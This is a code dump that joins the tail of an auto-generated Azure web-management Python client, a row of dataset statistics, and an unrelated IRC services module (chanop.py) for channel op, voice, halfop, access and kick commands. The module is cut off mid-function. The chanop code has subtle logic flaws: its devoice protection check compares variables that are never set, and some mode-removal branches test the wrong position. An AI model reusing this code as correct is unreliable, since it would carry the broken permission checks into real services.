# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CertificateCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_all_server_farms(
self, detailed=None, custom_headers=None, raw=False, **operation_config):
"""
Gets all App Service Plans for a subcription
:param detailed: False to return a subset of App Service Plan
properties, true to return all of the properties.
Retrieval of all properties may increase the API latency.
:type detailed: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ServerFarmCollection
<azure.mgmt.web.models.ServerFarmCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/serverfarms'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if detailed is not None:
query_parameters['detailed'] = self._serialize.query("detailed", detailed, 'bool')
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ServerFarmCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_all_sites(
self, custom_headers=None, raw=False, **operation_config):
"""
Gets all Web Apps for a subscription
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`SiteCollection <azure.mgmt.web.models.SiteCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/sites'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SiteCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_all_hosting_environments(
self, custom_headers=None, raw=False, **operation_config):
"""
Gets all hostingEnvironments (App Service Environment) for a
subscription
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`HostingEnvironmentCollection
<azure.mgmt.web.models.HostingEnvironmentCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/hostingEnvironments'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('HostingEnvironmentCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_all_managed_hosting_environments(
self, custom_headers=None, raw=False, **operation_config):
"""
Gets all managed hosting environments for a subscription
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ManagedHostingEnvironmentCollection
<azure.mgmt.web.models.ManagedHostingEnvironmentCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/managedHostingEnvironments'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ManagedHostingEnvironmentCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def get_all_classic_mobile_services(
self, custom_headers=None, raw=False, **operation_config):
"""
Gets all mobile services for a subscription
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ClassicMobileServiceCollection
<azure.mgmt.web.models.ClassicMobileServiceCollection>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/classicMobileServices'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ClassicMobileServiceCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def list_premier_add_on_offers(
self, custom_headers=None, raw=False, **operation_config):
"""
List premier add on offers
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/premieraddonoffers'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def is_hosting_environment_name_available(
self, name, custom_headers=None, raw=False, **operation_config):
"""
Whether hosting environment name is available
:param name: Hosting environment name
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/ishostingenvironmentnameavailable'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['name'] = self._serialize.query("name", name, 'str')
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def is_hosting_environment_with_legacy_name_available(
self, name, custom_headers=None, raw=False, **operation_config):
"""
Whether hosting environment name is available
:param name: Hosting environment name
:type name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: object
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/ishostingenvironmentnameavailable/{name}'
path_format_arguments = {
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('object', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def check_name_availability(
self, request, custom_headers=None, raw=False, **operation_config):
"""
Check if resource name is available
:param request: Name availability request
:type request: :class:`ResourceNameAvailabilityRequest
<azure.mgmt.web.models.ResourceNameAvailabilityRequest>`
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:rtype: :class:`ResourceNameAvailability
<azure.mgmt.web.models.ResourceNameAvailability>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
"""
# Construct URL
url = '/subscriptions/{subscriptionId}/providers/Microsoft.Web/checknameavailability'
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.config.api_version", self.config.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(request, 'ResourceNameAvailabilityRequest')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ResourceNameAvailability', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
| 42.860728 | 140 | 0.666598 | 3,624 | 34,160 | 6.103201 | 0.065673 | 0.047473 | 0.028212 | 0.042318 | 0.865946 | 0.861787 | 0.861787 | 0.848947 | 0.844968 | 0.838322 | 0 | 0.004178 | 0.23627 | 34,160 | 796 | 141 | 42.914573 | 0.843612 | 0.253279 | 0 | 0.831707 | 0 | 0 | 0.164654 | 0.101357 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034146 | false | 0 | 0.009756 | 0 | 0.109756 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f74a682f71e006f699110ab74b8589b436bd82e5 | 97,531 | py | Python | chanop.py | js3263854/python_unrealircd_services | 9d185511654720cba766becd7b326a8bd501e26e | [
"MIT",
"Unlicense"
] | 1 | 2021-06-15T09:43:33.000Z | 2021-06-15T09:43:33.000Z | chanop.py | js3263854/python_unrealircd_services | 9d185511654720cba766becd7b326a8bd501e26e | [
"MIT",
"Unlicense"
] | null | null | null | chanop.py | js3263854/python_unrealircd_services | 9d185511654720cba766becd7b326a8bd501e26e | [
"MIT",
"Unlicense"
] | null | null | null | ''' ChanOP commands '''
from db import *
from shared import *
import re
def process_chanop_halfopdehalfop(self, prefix, command, params):
conn = create_connection("users.db")
channel = params[0].strip()
nick = prefix[1:]
lvlhalfop = 0
lvldehalfop = 0
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
ret = check_channel_registered(conn, channel)
if ret == True:
ret = 0
ret = check_channel_access(conn, channel, nick)
lvlopper = ret
if ret >= 75:
if len(params) < 3:
if "dehalfop" in params[1]:
modes = "-"
else:
modes = "+"
ret = nick_to_uid(self, nick)
if ret is not None:
chan = channel[1:]
mod = getmodes(self, nick, chan)
print(mod)
chkmod = mod.find("%")
if chkmod == -1 and "dehalfop" not in params[1]:
self.chans[chan].onlist[ret] = mod + "%"
sendserv = ":00000000A MODE {} {}h {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif chkmod == 0 and "dehalfop" in params[1]:
strrep = mod
strrep = strrep.replace("%","")
self.chans[chan].onlist[ret] = strrep
sendserv = ":00000000A MODE {} {}h {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif chkmod == -1 and "dehalfop" in params[1]:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You are not half-opped on {}.\n".format(channel))
elif len(params) >= 3:
chan = channel[1:]
tbuffer = []
chkid = False
with conn:
opusers = map(str.strip, params[2:])
queue_buffer = []
for user in opusers:
conn = create_connection("users.db")
chkid = check_nickname_identified(conn, user)
ret = nick_to_uid(self, user)
if ret is not None:
mod = getmodes(self, user, chan)
chkmod = mod.find("%")
if chkmod == -1 and "dehalfop" not in params[1]:
print("Adding % to user: {}".format(user))
self.chans[chan].onlist[ret] = mod + "%"
elif chkmod == 0 and "dehalfop" in params[1]:
conn = create_connection("channels.db")
with conn:
chkprot = check_prot_status(conn, chan, user)
lvldehalfop = check_channel_access(conn, channel, user)
if lvldehalfop > lvlopper and chkprot == 1 and chkid:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has channel protection enabled and cannot be removed from half-op.\n".format(user))
continue
else:
print("Removing % from user: {}".format(user))
mod = mod.replace("%","")
self.chans[chan].onlist[ret] = mod
elif chkmod == -1 and "dehalfop" in params[1]:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not half-opped on {}.\n".format(user, channel))
continue
tbuffer.append(user)
if len(tbuffer) == 6:
if "dehalfop" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "h"*len(tbuffer), ' '.join(tbuffer))
queue_buffer.append(data)
print(data)
tbuffer = []
if len(tbuffer) > 0:
if "dehalfop" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "h"*len(tbuffer), ' '.join(tbuffer))
print(data)
queue_buffer.append(data)
self.sockssl.send(' '.join(queue_buffer).encode('ascii'))
tbuffer = []
queue_buffer = []
data = []
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You require at least 75 channel access on {} to use the halfop command.\n".format(channel))
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has not been registered.\n".format(channel))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} has not identified to services.\n".format(nick))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} is not a registered nickname.\n".format(nick))
def process_chanop_voicedevoice(self, prefix, command, params):
conn = create_connection("users.db")
channel = params[0].strip()
nick = prefix[1:]
lvlvoicer = 0
lvldevoicer = 0
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
ret = check_channel_registered(conn, channel)
if ret == True:
ret = 0
ret = check_channel_access(conn, channel, nick)
lvlopper = ret
if ret >= 75:
if len(params) < 3:
if "devoice" in params[1]:
modes = "-"
else:
modes = "+"
ret = nick_to_uid(self, nick)
print(ret)
if ret is not None:
chan = channel[1:]
mod = getmodes(self, nick, chan)
print(mod)
chkmod = mod.find("+")
print(f"chkmod: {chkmod}")
if chkmod == -1 and "devoice" not in params[1]:
self.chans[chan].onlist[ret] = mod + "+"
sendserv = ":00000000A MODE {} {}v {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif chkmod == 0 and "devoice" in params[1]:
strrep = mod
strrep = strrep.replace("+","")
self.chans[chan].onlist[ret] = strrep
sendserv = ":00000000A MODE {} {}v {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif chkmod == -1 and "devoice" in params[1]:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You are not voiced on {}.\n".format(channel))
elif len(params) >= 3:
chan = channel[1:]
tbuffer = []
chkid = False
with conn:
opusers = map(str.strip, params[2:])
queue_buffer = []
for user in opusers:
conn = create_connection("users.db")
chkid = check_nickname_identified(conn, user)
ret = nick_to_uid(self, user)
if ret is not None:
mod = getmodes(self, user, chan)
chkmod = mod.find("+")
if chkmod == -1 and "devoice" not in params[1]:
print("Adding + to user: {}".format(user))
self.chans[chan].onlist[ret] = mod + "+"
elif chkmod == 0 and "devoice" in params[1]:
conn = create_connection("channels.db")
with conn:
chkprot = check_prot_status(conn, chan, user)
lvldeopped = check_channel_access(conn, channel, user)
if lvldevoicer > lvlvoicer and chkprot == 1 and chkid:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has channel protection enabled and cannot be devoiced.\n".format(user))
continue
else:
print("Removing + from user: {}".format(user))
mod = mod.replace("+","")
self.chans[chan].onlist[ret] = mod
elif chkmod == -1 and "devoice" in params[1]:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not voiced on {}.\n".format(user, channel))
continue
tbuffer.append(user)
if len(tbuffer) == 6:
if "devoice" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "v"*len(tbuffer), ' '.join(tbuffer))
queue_buffer.append(data)
print(data)
tbuffer = []
if len(tbuffer) > 0:
if "devoice" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "v"*len(tbuffer), ' '.join(tbuffer))
print(data)
queue_buffer.append(data)
self.sockssl.send(' '.join(queue_buffer).encode('ascii'))
tbuffer = []
queue_buffer = []
data = []
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You require at least 75 channel access on {} to use the voice command.\n".format(channel))
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has not been registered.\n".format(channel))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} has not identified to services.\n".format(nick))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} is not a registered nickname.\n".format(nick))
def process_chanop_opdeop(self, prefix, command, params):
conn = create_connection("users.db")
channel = params[0].strip()
nick = prefix[1:]
lvlopper = 0
lvldeopped = 0
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
ret = check_channel_registered(conn, channel)
if ret == True:
ret = 0
ret = check_channel_access(conn, channel, nick)
lvlopper = ret
if ret >= 100:
if len(params) < 3:
if "deop" in params[1]:
modes = "-"
else:
modes = "+"
ret = nick_to_uid(self, nick)
if ret is not None:
chan = channel[1:]
mod = getmodes(self, nick, chan)
print(mod)
chkmod = mod.find("@")
if chkmod == -1 and "deop" not in params[1]:
self.chans[chan].onlist[ret] = mod + "@"
sendserv = ":00000000A MODE {} {}o {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif chkmod != -1 and "deop" in params[1]:
strrep = mod
strrep = strrep.replace("@","")
self.chans[chan].onlist[ret] = strrep
sendserv = ":00000000A MODE {} {}o {}\r\n".format(channel, modes, nick)
print(sendserv)
self.sockssl.send(sendserv.encode('ascii'))
elif chkmod == -1 and "deop" in params[1]:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You are not opped on {}.\n".format(channel))
elif len(params) >= 3:
chan = channel[1:]
tbuffer = []
chkid = False
with conn:
opusers = map(str.strip, params[2:])
queue_buffer = []
for user in opusers:
conn = create_connection("users.db")
chkid = check_nickname_identified(conn, user)
ret = nick_to_uid(self, user)
if ret is not None:
mod = getmodes(self, user, chan)
chkmod = mod.find("@")
if chkmod == -1 and "deop" not in params[1]:
print("Adding @ to user: {}".format(user))
self.chans[chan].onlist[ret] = mod + "@"
elif chkmod == 0 and "deop" in params[1]:
conn = create_connection("channels.db")
with conn:
chkprot = check_prot_status(conn, chan, user)
lvldeopped = check_channel_access(conn, channel, user)
if lvldeopped > lvlopper and chkprot == 1 and chkid:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has channel protection enabled and cannot be deopped.\n".format(user))
continue
else:
print("Removing @ from user: {}".format(user))
mod = mod.replace("@","")
self.chans[chan].onlist[ret] = mod
elif chkmod == -1 and "deop" in params[1]:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} is not opped on {}.\n".format(user, channel))
continue
tbuffer.append(user)
if len(tbuffer) == 6:
if "deop" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "o"*len(tbuffer), ' '.join(tbuffer))
queue_buffer.append(data)
print(data)
tbuffer = []
else:
print(f"{user} UID is None")
if len(tbuffer) > 0:
if "deop" in params[1]:
modes = "-"
else:
modes = "+"
data = ":00000000A MODE {} {}{} {}\n".format(channel, modes, "o"*len(tbuffer), ' '.join(tbuffer))
print(data)
queue_buffer.append(data)
self.sockssl.send(' '.join(queue_buffer).encode('ascii'))
tbuffer = []
queue_buffer = []
data = []
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: You don\'t have operator access on {}.\n".format(channel))
else:
self.send_msg_as("chanop", "NOTICE", nick, "ERROR: {} has not been registered.\n".format(channel))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} has not identified to services.\n".format(nick))
else:
self.send_msg_as("nickop", "NOTICE", nick, "ERROR: {} is not a registered nickname.\n".format(nick))
def process_chanop_access(self, prefix, command, params):
nick = prefix[1:]
channel = params[0]
conn = create_connection("users.db")
with conn:
results = check_nickname_exists(conn, nick)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
with conn:
ret = check_channel_registered(conn, channel)
if ret == True:
if check_channel_access(conn, channel, nick) >= 1:
if len(params) == 2:
rows = list_channel_access(conn, channel, nick)
send_notice_as_chanop(self, nick, "*** Channel membership list for {} on {} ***".format(nick, channel))
send_notice_as_chanop(self, nick, " NickName Level AOP AOV Prot")
for row in rows:
if str(row[0]) == nick:
nickname = row[0]
level = row[1]
aop = row[2]
aov = row[3]
prot = row[4]
aop = "Yes" if aop == 1 else "No"
aov = "Yes" if aov == 1 else "No"
prot = "Yes" if prot == 1 else "No"
send_notice_as_chanop(self, nick, " {}{} {} {} {} ".format(align_text(nickname.strip()), level.strip(), aop.strip(), aov.strip(), prot.strip()))
send_notice_as_chanop(self, nick, "*** End of List ***")
elif params[2] == "*\r\n":
rows = list_channel_access(conn, channel, None)
send_notice_as_chanop(self, nick, "*** Channel membership list for {} on {} ***".format("*", channel))
send_notice_as_chanop(self, nick, " NickName Level AOP AOV Prot")
for row in rows:
print(row)
nickname = row[0]
level = row[1]
aop = row[2]
aov = row[3]
prot = row[4]
aop = "Yes" if aop == 1 else "No"
aov = "Yes" if aov == 1 else "No"
prot = "Yes" if prot == 1 else "No"
send_notice_as_chanop(self, nick, " {}{} {} {} {} ".format(align_text(nickname.strip()), level.strip(), aop.strip(), aov.strip(), prot.strip()))
send_notice_as_chanop(self, nick, "*** End of List ***")
elif len(params) == 3:
rows = list_channel_access(conn, channel, None)
send_notice_as_chanop(self, nick, "*** Channel membership list for {} on {} ***".format(params[2].strip(), channel))
send_notice_as_chanop(self, nick, " NickName Level AOP AOV Prot")
for row in rows:
print(row)
nickname = row[0]
level = row[1]
aop = row[2]
aov = row[3]
prot = row[4]
aop = "Yes" if aop == 1 else "No"
aov = "Yes" if aov == 1 else "No"
prot = "Yes" if prot == 1 else "No"
if nickname == params[2].strip():
send_notice_as_chanop(self, nick, " {}{} {} {} {} ".format(align_text(nickname.strip()), level.strip(), aop.strip(), aov.strip(), prot.strip()))
send_notice_as_chanop(self, nick, "*** End of List ***")
else:
send_notice_as_chanop(self, nick, "ERROR: You don't have access to {}.".format(channel))
else:
send_notice_as_nickop(self, nick, "ERROR: Channel {} has not been registered.".format(channel))
else:
send_notice_as_nickop(self, nick, "ERROR: You have not identified to services.")
else:
send_notice_as_nickop(self, nick, "ERROR: The username {} has not been registered.".format(nick))
def process_chanop_kick(self, prefix, command, params):
nick = prefix[1:]
channel = params[0]
chan = channel[1:]
kicked = ""
reason = ""
kicked_uid = ""
if len(params) >= 3:
kicked = params[2].strip()
if len(params) >= 4:
reason = ' '.join(params[3:])
else:
reason = "You have been kicked.\n"
conn = create_connection("users.db")
with conn:
idstatus = check_nickname_identified(conn, kicked)
results = check_nickname_exists(conn, nick)
kicked_uid = nick_to_uid(self, kicked)
if results == True:
if check_nickname_identified(conn, nick) == True:
conn = create_connection("channels.db")
with conn:
ret = check_channel_registered(conn, channel)
if ret == True:
level = check_channel_access(conn, channel, nick)
if level >= 50:
if len(params) >= 3:
protstatus = check_prot_status(conn, chan, kicked)
if kicked_uid != None:
kicked_user_l = check_channel_access(conn, channel, kicked)
